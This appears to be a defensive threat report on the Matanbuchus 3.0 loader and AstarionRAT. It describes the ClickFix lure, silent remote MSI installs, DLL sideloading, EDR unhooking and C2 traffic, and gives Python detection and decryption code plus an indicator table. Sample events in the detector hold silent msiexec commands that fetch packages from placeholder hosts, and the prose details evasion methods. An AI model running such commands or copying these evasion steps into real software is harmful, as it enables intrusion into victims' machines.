Matanbuchus 3.0 has resurfaced in a tightly orchestrated intrusion chain that blends ClickFix social engineering, silent MSI installations, DLL sideloading, and a new remote access trojan dubbed AstarionRAT, underscoring how mature loaders are evolving toward stealthy, multi‑stage operations rather than simple payload delivery.
The attack starts with a ClickFix prompt that convinces the victim to copy and paste a crafted command into a local console, effectively turning the user into the execution vector and bypassing email and attachment filtering.
The command abuses msiexec.exe with mixed casing and the /q (silent) flag to install a remote MSI package without any visible UI, ensuring the user sees no installer windows or warnings.
The MSI itself is fetched from newly registered, brand‑impersonating infrastructure, using obfuscated URLs that collapse to a single download path but make proxy and log analysis more difficult.
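The two traits above, a silent msiexec install and a package pulled straight from a URL, are what a process-creation rule should key on. The following detection logic is an added example written for this article and is not code from Huntress or the original report; the Sysmon-style events, the `example.invalid` hosts and the parent-process list are constructed assumptions. It normalises the image name so mixed casing cannot dodge a string match, and separately records that unusual casing as its own indicator.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'mSiExEc.EXE /i "http://pkg.example.invalid/setup.msi" /q'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i C:\Users\alice\Downloads\vendor.msi'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"msiexec -package https://cdn.example.invalid/a.msi -quiet"},
    {"ParentImage": r"C:\Program Files\Acme\updater.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\Acme\update.msi /qn"},
]

# msiexec accepts both "/" and "-" switch prefixes; /q, /qn, /qb, /qr, /qf and /quiet all suppress UI.
QUIET_RE = re.compile(r"(?:^|\s)[/-](?:q[nbrf]?|quiet)\b", re.I)
URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.I)
# Consoles a ClickFix victim pastes into (assumed list; explorer.exe is left out as too noisy).
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}
# Spellings seen from legitimate launchers; anything else is treated as deliberate case-mangling.
CANONICAL_SPELLINGS = {"msiexec.exe", "msiexec", "MSIEXEC.EXE", "Msiexec.exe", "MsiExec.exe"}


def first_token(cmdline):
    """Return the image token of a Windows command line, honouring a quoted path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(" ", 1)[0]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def evaluate(event):
    """Score one event; None when msiexec is not involved or nothing is suspicious."""
    cmd = event["CommandLine"]
    image = basename(first_token(cmd))
    if image.lower() not in ("msiexec.exe", "msiexec"):
        return None
    reasons = []
    if QUIET_RE.search(cmd):
        reasons.append("silent install switch")
    if URL_RE.search(cmd):
        reasons.append("package fetched from remote URL")
    if image not in CANONICAL_SPELLINGS:
        reasons.append("unusual casing of msiexec")
    if basename(event["ParentImage"]).lower() in INTERACTIVE_PARENTS:
        reasons.append("spawned from an interactive shell")
    if not reasons:
        return None
    if "silent install switch" in reasons and "package fetched from remote URL" in reasons:
        severity = "high"
    elif "silent install switch" in reasons and "spawned from an interactive shell" in reasons:
        severity = "medium"
    else:
        severity = "low"
    return {"severity": severity, "reasons": reasons, "command": cmd}


def scan(events):
    """Run the rule over a batch and keep only the hits."""
    return [f for f in (evaluate(e) for e in events) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["severity"], hit["reasons"], hit["command"])
```

The silent-plus-remote-URL combination is what drives the high severity; a quiet install of a local package from a software updater is left at low so the rule stays usable on estates where managed deployment uses `/qn` routinely.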
Once executed, the MSI deploys files under fake “security product” directories in the user profile, dropping renamed legitimate binaries alongside malicious DLLs designed for sideloading.
Among these are Zillya! Antivirus components and Visual C++ runtimes, plus SystemStatus.dll, which acts as the embedded Matanbuchus 3.0 loader.
The Huntress Tactical Response team and SOC responded to a hands-on intrusion that began with a ClickFix infection, the social engineering technique that just won’t die.
A renamed 7‑Zip executable extracts a password‑protected archive that contains the full Zillya sideloading bundle, reinforcing the theme of living‑off‑the‑land with trusted tools wrapped around custom code.
Matanbuchus 3.0 Unleashes AstarionRAT
Matanbuchus 3.0 represents a ground‑up rewrite of the loader, sold as a high‑end Malware‑as‑a‑Service aimed at targeted operations rather than high‑volume spam.
In the observed intrusion, the operators used this foothold to move from initial access to domain controllers in under 40 minutes, leveraging PsExec, rogue account creation, and Defender exclusions, tactics consistent with pre‑ransomware staging or large‑scale data theft.
The loader is heavily padded with junk API calls, dead loops, and opaque conditional branches that inflate the control‑flow graph and burn sandbox time, complicating both dynamic and static analysis.
All sensitive strings are stored in a single ChaCha20‑encrypted blob; an index table tracks offsets and lengths, and the loader decrypts required strings on demand with a shared key and nonce pulled from the blob header.
Core shellcode is stored externally in a file named INFO, also ChaCha20‑encrypted, with the key recovered via brute‑force using a known‑plaintext check based on a Heaven's Gate shellcode prologue.
Once decrypted, the shellcode reconstructs a hardcoded HTTPS C2 URL character by character, downloads the main Matanbuchus module, and decrypts it in 8 KB chunks with ChaCha20, using a custom header format that includes a 32‑byte key and 12‑byte nonce.
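Both the on-demand string blob and the chunked module download reduce to the same operation: ChaCha20 over a buffer whose key and nonce sit in a small header. The block below is an added example, not Huntress's decryptor or the loader's own code, showing how an analyst reproduces that in pure Python (RFC 8439 ChaCha20, no third-party library). The header layouts are assumptions for illustration: the string blob is taken as key(32) | nonce(12) | count(u32) | count × (offset u32, length u32) | ciphertext, and the downloaded module as key(32) | nonce(12) | ciphertext decrypted 8 KB at a time with the block counter continuing across chunks. `build_string_blob` only exists to construct test input.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl32(v, n):
    return ((v << n) & MASK32) | (v >> (32 - n))


def _quarter_round(s, a, b, c, d):
    # RFC 8439 section 2.1, operating in place on the 16-word state.
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block: constants | key | counter | nonce, 20 rounds."""
    raw = b"expand 32-byte k" + key + struct.pack("<I", counter) + nonce
    state = list(struct.unpack("<16I", raw))
    x = state[:]
    for _ in range(10):  # 10 double rounds = 20 rounds
        _quarter_round(x, 0, 4, 8, 12); _quarter_round(x, 1, 5, 9, 13)
        _quarter_round(x, 2, 6, 10, 14); _quarter_round(x, 3, 7, 11, 15)
        _quarter_round(x, 0, 5, 10, 15); _quarter_round(x, 1, 6, 11, 12)
        _quarter_round(x, 2, 7, 8, 13); _quarter_round(x, 3, 4, 9, 14)
    return struct.pack("<16I", *((a + b) & MASK32 for a, b in zip(x, state)))


def chacha20_xor(key, nonce, data, counter=1):
    """Encrypt or decrypt (same operation) with a 32-byte key and 12-byte nonce."""
    assert len(key) == 32 and len(nonce) == 12
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = chacha20_block(key, counter + i // 64, nonce)
        out.extend(b ^ k for b, k in zip(data[i:i + 64], ks))
    return bytes(out)


# --- Assumed layout 1: string blob with an index table, decrypted on demand ---
def decrypt_string(blob, index):
    key, nonce = blob[:32], blob[32:44]
    count = struct.unpack_from("<I", blob, 44)[0]
    table = list(struct.iter_unpack("<II", blob[48:48 + 8 * count]))
    body = blob[48 + 8 * count:]
    off, ln = table[index]
    # Only the keystream blocks covering [off, off+ln) are generated; the
    # counter is advanced to the block containing `off`, then the lead-in bytes dropped.
    ks_start = off - off % 64
    plain = chacha20_xor(key, nonce, body[ks_start:off + ln], counter=1 + ks_start // 64)
    return plain[off % 64:]


def build_string_blob(key, nonce, strings):
    """Constructed test helper: pack `strings` into the assumed blob layout."""
    table, off = [], 0
    for s in strings:
        table.append(struct.pack("<II", off, len(s)))
        off += len(s)
    header = key + nonce + struct.pack("<I", len(strings)) + b"".join(table)
    return header + chacha20_xor(key, nonce, b"".join(strings))


# --- Assumed layout 2: downloaded module, key | nonce | ciphertext, 8 KB chunks ---
def decrypt_chunked(blob, chunk_size=8192):
    key, nonce, body = blob[:32], blob[32:44], blob[44:]
    assert chunk_size % 64 == 0  # keeps chunk edges on keystream block edges
    out = bytearray()
    for i in range(0, len(body), chunk_size):
        out.extend(chacha20_xor(key, nonce, body[i:i + chunk_size], counter=1 + i // 64))
    return bytes(out)
```

The RFC 8439 section 2.4.2 vector (key 00..1f, nonce 00 00 00 00 00 00 00 4a 00 00 00 00, counter 1) is the quickest sanity check for the primitive before pointing it at a real sample; a decryptor that round-trips its own output but fails that vector is wrong in a way that still "works" on constructed data.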
Before executing downstream payloads, Matanbuchus enumerates running processes for EDR and AV names, allowing operators to adapt their playbook to the victim’s security stack.
Advertised on underground forums at $10,000/month for the HTTPS version and $15,000 for the DNS version, Matanbuchus 3.0 boasts a new client and panel built from scratch.
The next stage involves a second DLL sideload chain with a legitimate java.exe and a malicious jli.dll that embeds a full Lua 5.4.7 interpreter to orchestrate shellcode execution.
The loader first unhooks kernel32.dll and ntdll.dll by mapping clean copies from the Windows KnownDlls object directory and overwriting the hooked .text sections in memory, stripping away user‑mode EDR inline hooks before any sensitive API calls.
It then decrypts an auxiliary Lua script (SySUpd) with a rolling XOR key, loads it into the embedded interpreter, and uses custom Lua‑registered functions to allocate RWX memory, copy shellcode, and pivot execution into a reflective PE loader.
This reflective loader consumes a custom binary stream format containing the Stage 1 DLL components, including the .text section, encrypted imports and relocations, and XOR keys.
It reconstructs the PE in memory, resolves imports by hashing export names, patches the IAT, and finally passes a large compressed Stage 2 payload to be decompressed via RtlDecompressBuffer using LZNT1.
The output is a raw PE image identified as Beacon.exe, which is mapped into memory and executed as the final AstarionRAT implant.
ClickFix Social Engineering
AstarionRAT is a fully featured remote access trojan with 24 documented commands covering file management, process control, credential‑backed logon, SOCKS5 tunneling, port scanning, and in‑memory reflective payload execution.
Three global constants stored in the .data section feed into opaque predicates repeated hundreds of times throughout the binary.
On initial check‑in, it builds a metadata structure with a 0xBEEF magic value, randomly generated session key material (later hashed with SHA‑256), system code pages, a random even beacon ID, PID, privilege level, OS version, local IP, and an identifier string combining computer name, username, and process name.
This metadata is RSA‑encrypted with a hardcoded 1024‑bit public key and sent over HTTP GET, with subsequent task results returned via HTTP POST, in a polling loop that defaults to 10‑second intervals.
The HTTP profile is crafted to blend into enterprise traffic, using an Edge‑style User‑Agent, Chinese language preferences, and a Google referer, while embedding the beacon data inside a cookie value that masquerades as application telemetry.
C2 domains are stored RC4‑encrypted and hex‑encoded in the data section, decrypted at runtime with a 110‑byte key, with one observed endpoint masquerading as a legitimate “organization events” intake path.
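The traits listed above (Edge user agent, Chinese Accept-Language, Google referer, beacon data in a cookie, 10-second GET polling with POSTed results) are individually common and only telling in combination, which makes them a proxy-log scoring problem rather than a single signature. The following is an added example for this article, not Huntress's detection content; the log lines are constructed, the hosts use `example.invalid`, and the estate's expected locale (`en`) is an assumption. The polling path is the one reported for the implant; the 10-second target comes from the default interval described above.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

EDGE_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
           "(KHTML, like Gecko) Chrome/120.0 Safari/537.36 Edg/120.0")
BEACON_PATH = "/intake/organizations/events?channel=app"
# Constructed cookie: base64 of "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", posing as telemetry.
OPAQUE_COOKIE = "tlm=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5"
EXPECTED_LANG = "en"  # assumed estate locale
B64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")


def _line(hms, method, host, path, referer, lang, cookie):
    # Proxy log format assumed here: ts|src|method|host|path|user_agent|referer|accept_language|cookie
    return "|".join(["2024-01-01T10:" + hms, "10.0.0.5", method, host, path, EDGE_UA, referer, lang, cookie])


# Constructed sample log: six beacon polls 10 s apart, one task result, and some ordinary browsing.
SAMPLE_LOG = [_line(f"00:{s:02d}", "GET", "c2.example.invalid", BEACON_PATH,
                    "https://www.google.com/", "zh-CN,zh;q=0.9", OPAQUE_COOKIE) for s in range(0, 60, 10)]
SAMPLE_LOG.append(_line("00:55", "POST", "c2.example.invalid", BEACON_PATH,
                        "https://www.google.com/", "zh-CN,zh;q=0.9", OPAQUE_COOKIE))
SAMPLE_LOG += [_line(t, "GET", "www.example.invalid", "/news", "https://www.example.invalid/",
                     "en-US,en;q=0.9", "pref=dark") for t in ("00:03", "00:47", "02:15")]


def parse(line):
    ts, src, method, host, path, ua, referer, lang, cookie = line.split("|")
    return dict(ts=datetime.fromisoformat(ts), src=src, method=method, host=host,
                path=path, ua=ua, referer=referer, lang=lang, cookie=cookie)


def profile_flags(r):
    """Static HTTP-profile oddities of a single request."""
    flags = set()
    if r["referer"].startswith("https://www.google.com") and not r["host"].endswith("google.com"):
        flags.add("google referer to non-google host")
    if not r["lang"].lower().startswith(EXPECTED_LANG):
        flags.add("accept-language does not match estate locale")
    if B64_RE.match(r["cookie"].partition("=")[2]):
        flags.add("opaque base64-like cookie value")
    return flags


def periodicity(timestamps, target=10.0, tolerance=1.0):
    """Inter-arrival statistics of the GET polls; None when there are too few samples."""
    if len(timestamps) < 4:
        return None
    ts = sorted(timestamps)
    deltas = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    median, spread = statistics.median(deltas), statistics.pstdev(deltas)
    return {"median": median, "stdev": spread,
            "periodic": abs(median - target) <= tolerance and spread <= tolerance}


def analyze(lines):
    """Group by (src, host, path) and score profile flags plus polling regularity."""
    flows = defaultdict(lambda: {"flags": set(), "gets": [], "posts": 0})
    for r in map(parse, lines):
        f = flows[(r["src"], r["host"], r["path"])]
        f["flags"] |= profile_flags(r)
        if r["method"] == "GET":
            f["gets"].append(r["ts"])
        elif r["method"] == "POST":
            f["posts"] += 1
    report = {}
    for key, f in flows.items():
        timing = periodicity(f["gets"])
        periodic = bool(timing and timing["periodic"])
        # Regular polling weighs more than any single header quirk; a POST on the
        # same path while polling (task results) adds one more point.
        score = len(f["flags"]) + (2 if periodic else 0) + (1 if periodic and f["posts"] else 0)
        report[key] = {"flags": sorted(f["flags"]), "timing": timing, "posts": f["posts"], "score": score}
    return report


if __name__ == "__main__":
    for key, entry in analyze(SAMPLE_LOG).items():
        print(key, entry["score"], entry["flags"], entry["timing"])
```

Grouping on the full path (query string included) is deliberate: the polling regularity is the strongest signal, and it only shows up if every poll to the same endpoint lands in one bucket. On real proxy data the tolerance should be widened for implants that add jitter.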
Indicators of compromise (IOCs)
| Item | Description |
| --- | --- |
| hxxp://binclloudapp[.]com/466943 | ClickFix MSI delivery C2 |
| hxxps://marle[.]io/check/updprofile.aspx | Matanbuchus C2, serves encrypted main module |
| www.ndibstersoft[.]com | AstarionRAT C2 |
| /intake/organizations/events?channel=app | AstarionRAT beacon polling path |
| %APPDATA%\AegisLynx Cybernetics Ltd\AegisLynx Threat Fabric\AVU | Matanbuchus MSI install path |
| %APPDATA%\DocuRay Technologies S.r.l\DocuRay PDF Professional\ZAVY | Matanbuchus MSI install path |
| %APPDATA%\HelixShield Technologies ApS\HelixShield Adaptive Security\APSZAV | Matanbuchus MSI install path |
| %LOCALAPPDATA%\Temp\ndvyxgdriggmarrf | Stage 2 DLL sideloading package drop path |
| INFO SHA256: de81e2155d797ff729ed3112fd271aa2728e75fc71b023d0d9bb0f62663f33b3 | Encrypted shellcode payload delivered alongside the MSI; contains shellcode that downloads the Matanbuchus main module from the C2 |
| SystemStatus.dll SHA256: 6ffae128e0dbf14c00e35d9ca17c9d6c81743d1fc5f8dd4272a03c66ecc1ad1f | Matanbuchus loader payload |
| jli.dll SHA256: 68858d3cbc9b8abaed14e85fc9825bc4fffc54e8f36e96ddda09e853a47e3e31 | Stage 2 loader; decrypts and executes the Lua script from SySUpd |
| SySUpd SHA256: 03c624d251e9143e1c8d90ba9b7fa1f2c5dc041507fd0955bdd4048a0967a829 | XOR-encrypted Lua script |
| Reflective PE loader SHA256: 8e54cd12591d67dfbe72e94c1bde6059e1cba157e6786aec63f8f9e3c71fb925 | Reflective PE loader that reconstructs the Stage 1 DLL from a custom binary stream and passes the final payload (AstarionRAT) to it |
| Stage 1 payload SHA256: c31c8edbf94c85cc9bc46a5665c45a3556c48d5ad615c0a44e14e5406d80df12 | Small loader with no import table; XOR-decrypts and LZNT1-decompresses the final payload, maps it into memory, and creates a thread to execute it |
| Beacon.exe SHA256: eecc83add16f3d513a9701e9a646b1885014229ac6f86addd6b10afb64d1d2af | AstarionRAT |
| Updprofile.aspx SHA256: ea378496135318ac5ad667a032fa4a9686add9d27fe4a7c549c937611b5099e5 | Matanbuchus core module |